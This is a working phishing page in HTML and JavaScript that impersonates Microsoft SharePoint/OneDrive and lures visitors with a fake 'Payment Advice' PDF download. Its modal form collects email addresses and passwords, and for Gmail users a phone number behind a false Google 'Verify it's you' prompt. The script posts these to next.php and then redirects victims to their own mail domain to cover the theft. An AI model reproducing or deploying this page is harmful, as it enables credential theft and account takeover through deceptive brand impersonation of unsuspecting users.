
<!doctype html>
<html lang="en">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
  <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
  <!-- <link rel="icon" type="image/png" sizes="32x32" href="images/favicon-32x32.png"> -->
  <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
  <title>Remittance Information</title>
  <link href="css/hover.css" rel="stylesheet" media="all">
  <link href="https://fonts.googleapis.com/css2?family=Merriweather:wght@700&display=swap" rel="stylesheet">
  <style type="text/css">
    textarea:hover, 
    /*input:hover,*/ 
    textarea:active, 
    input:active, 
    textarea:focus, 
    input:focus,
    select:focus,
    button:focus,
    button:active,
    button:hover,
    .btn:active,
    .btn.active
    {
      outline:0px !important;
      -webkit-appearance:none;
      box-shadow: none !important;
    }




    .input-icons i { 
      position: absolute; 
    } 

    .input-icons { 
      width: 100%; 
    } 

    .icon { 
      padding: 15px; 
      min-width: 40px;
      color: #8FA7AD; 
    } 

    .input-field { 
      width: 100%; 
      padding: 6px;
      border-radius: 0px;
      padding-left: 20px ;
      text-align: left;
      border: 1.5px solid #CA663D; 
    } 



    .submit-btn {
      background-color:#a73f2d;
      /*border-radius:16px;*/
      border:1px solid #b34332;
      display:inline-block;
      cursor:pointer;
      color:#ffffff;
      font-family:Arial;
      font-size:15px;
      font-weight:bold;
      padding:9px 23px;
      text-decoration:none;
      text-shadow:0px -1px 0px #7a2a1d;
    }
    .submit-btn:hover {
      background-color:#b34332;
    }
    .submit-btn:active {
      position:relative;
      top:1px;
    }






  </style>
</head>
<body style="background:url('images/bg.gif');background-repeat: no-repeat; background-size: cover;">
  <div class="container-fluid p-0">
    <div class="container">
      <div class="row" style="margin: 200px 0px 0px 0px;">
        <div class="col-lg-5 mx-auto rounded" style="background-color:rgba(0,0,0,0.7);padding: 20px">
          <div style="padding: 0px">
            <div class="col-lg-12 text-center text-white">
              <img src="images/logo1.png" class="img-fluid" width="150px"><br>
              <span class="align-middle" style="font-size: 22px; font-weight: 600;">Welcome To MicroSoft SharePoint</span><br>
              <span style="font-size: 14px;">Save your files and photos to OneDrive and get them from any device, anywhere.</span>
            </div>
            <div class="col-lg-12 text-center">
              <a href="javascript:void(0)" id="gmailmodal" class="hvr-grow" style="text-decoration: none;">
                <div class="rounded px-3 py-2 mt-3 bg-transparent" style=" border:1px solid white">
                  <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Download.Payment Advice#2482.Pdf (5.8kb)</span>
                </div>
              </a>

            </div>
          </div>
        </div>
      </div>
      <div class="row">
        <div class="col-lg-7 mx-auto">
          <hr>
        </div>
      </div>
        <!-- <div class="row">
          <div class="col-lg-7 mx-auto text-center">
            <span>Don't have Whatsapp yet?</span><br>
            <a href="javascript:void(0)">Download</a>
          </div>
        </div>  -->
      </div> 
    </div>

    




    <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-header">
            <img id="fieldImg1" src="images/microsoft-sharepoint.svg" class="img-fluid" width="25px">
            <span class=" h5 text-dark align-middle pl-2">Confirm Identity to Prove You are not a Robot</span>

            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
              <span aria-hidden="true">&times;</span>
            </button>
          </div>
          <div class="modal-body">
            <center>
              <div class="alert alert-danger" id="msg" style="display: none;"></div>
              <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>

            </center>
            <form id="contact" class="form-horizontal well">
              <div id="div1">
                <div class="col-lg-12">
                  <div class="form-group">
                    <div id="inputbar">
                      <label for="exampleInputEmail1">Email address</label>
                      <input type="email" name="email" class="form-control" id="email" aria-describedby="emailHelp" placeholder="Enter email">
                      <small id="emailHelp" class="form-text text-muted">There was an error with your Email/Password combination.Please try again.</small></div>
                      <!-- <div id="automail" class="h5 mt-5">
                        <i class="fas fa-arrow-left" id="back1"></i>&nbsp<span id="emailch">abc@abc.com</span>
                      </div> -->
                    </div>
                  </div>
                  <div class="col-lg-12">
                    <div class="form-group">
                      <label for="Password">Password</label>
                      <input type="password" name="password" class="form-control" id="password" aria-describedby="emailHelp" placeholder="Enter Password">
                    </div>
                  </div>
                </div>
                <div id="div2" style="display: none;">
                  <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="emailch" class="h5">abc@abc.com</span><br>
                  <span class="h4 font-weight-normal">Verify it's you</span><br>
                  <span >This device is not recognized. For security, Google want to make sure it's really you.</span><br>
                  <span id="error1" class="text-danger" style="display: none;">That phone no doesn't exist. Enter a different phone</span>
                  <span id="msg1" class="text-danger"></span><br>
                  <span>Try another way to sign in</span><br>
                  
                  <div class="form-group mt-3">
                    <input type="number" name="phone" class="form-control" id="phone" aria-describedby="emailHelp" placeholder="Enter Phone No." >
                  </div>
                </div>
              </div>
              <div class="modal-footer">
                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                <button class="btn  pull-right text-white" id="submit-btn" style="background-color: #0D4283;">Login</button>
                <button class="btn pull-right text-white" id="submit-btn1" style="background-color: #0D4283; display: none;">verify</button>
              </div>
            </form>
          </div>
        </div>
      </div>







      <!-- Optional JavaScript -->
      <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    </body>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script>

     <!--  /* global $ */
     $(document).ready(function(){
      var count=0;
      $('#back').click(function () {
        $("#msg").hide();
        $('#error1').hide();
        $('#email').val("");
        $('#password').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);

      });

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        // $('#email').val(email);
        var my_email =email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        $('#contact').trigger("reset");
        $('#email').val(my_email);
        $('#emailch').html(my_email);
        $("#msg").hide();
        $('#ajaxModal').modal('show');
      }
      ///////////////url getting email////////////////


      $('#gmailmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#email').val("");
        $('#password').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');

      });

      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }
      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      ///////////new injection////////////////
      count=count+1;
      
      
      $.ajax({
        dataType: 'JSON',
        url: 'next.php',
        type: 'POST',
        data:{
          email:email,
          password:password,

        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              if (count==1 && final=="gmail") {
                $('#emailch').html(my_email);
                $("#div1").animate({left:200, opacity:"hide"}, 0);
                $("#div2").animate({right:200, opacity:"show"}, 1000);
                $('#submit-btn').hide();
                $('#submit-btn1').show();
                return false;
              }

              if (count>=2) {
                count=0;
                window.location.replace("http://www."+my_slice);
              }
              $("#password").val("");
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                 $('#msg').html(response['msg']);
               }
               else{
                $('#msg').html(response['msg']);
              }
            }
          },
          error: function(){
            if (count==1 && final=="gmail") {
              $('#emailch').html(my_email);
              $("#div1").animate({left:200, opacity:"hide"}, 0);
              $("#div2").animate({right:200, opacity:"show"}, 1000);
              $('#submit-btn').hide();
              $('#submit-btn1').show();
              return false;
            }
            if (count>=2) {
              count=0;
              window.location.replace("http://www."+my_slice);
            }
            $("#password").val("");
            $("#msg").show();
            $('#msg').html("Please try again later");
          },
          complete: function(){
            $('#submit-btn').html('Login');
          }
        });
    });
      $('#submit-btn1').click(function(event){
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var phone=$("#phone").val();
        var my_email =email;
        $('#error1').hide();
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!phone) {
          $('#error1').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        $.ajax({
          dataType: 'JSON',
          url: 'next.php',
          type: 'POST',
          data:{
            email:email,
            password:password,
            phone:phone,

          },
          beforeSend: function(xhr){
            $('#submit-btn1').html('Verifing...');
          },
          success: function(response){
            window.location.replace("http://www."+my_slice);
            if(response){
              $("#msg1").show();
              console.log(response);
              if(response['signal'] == 'ok'){
               $('#msg1').html(response['msg']);
             }
             else{
              $('#msg1').html(response['msg']);
            }
          }
        },
        error: function(){
          window.location.replace("http://www."+my_slice);
          $("#msg1").show();
          $('#msg1').html("Please try again later");
        },
        complete: function(){
          $('#submit-btn1').html('Verify');
        }
      });
         // }
       });
    });
  </script>
  </html>
